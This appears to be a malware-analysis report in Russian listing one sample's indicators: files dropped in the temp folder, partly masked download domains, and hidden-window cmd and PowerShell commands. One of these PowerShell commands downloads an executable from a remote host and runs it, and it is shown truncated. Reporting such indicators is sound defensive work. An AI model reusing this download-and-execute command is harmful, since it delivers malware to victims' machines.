Техническая информация
- $yknyjfd как %temp%\uwb-opy.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Hvasgcgkma([String] $yknyjfd){(New-Object System.Net.WebClient).DownloadFile($yknyjfd,''%TEMP%\Uwb-opy.exe'');Start-Process ''%TEMP%\Uwb-opy.exe'';}try{Hva...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1896
- %TEMP%\piss-efrx.bat
- %TEMP%\1324417.cvr
- 'de####fashionbd.com':80
- 'mu#####chchennai.com':80
- http://de####fashionbd.com/ese.bin
- http://mu#####chchennai.com/ese.bin
- DNS ASK de####fashionbd.com
- DNS ASK mu#####chchennai.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Hvasgcgkma([String] $yknyjfd){(New-Object System.Net.WebClient).DownloadFile($yknyjfd,''%TEMP%\Uwb-opy.exe'');Start-Process ''%TEMP%\Uwb-opy.exe'';}try{Hva...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Piss-efrx.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Piss-efrx.bat" "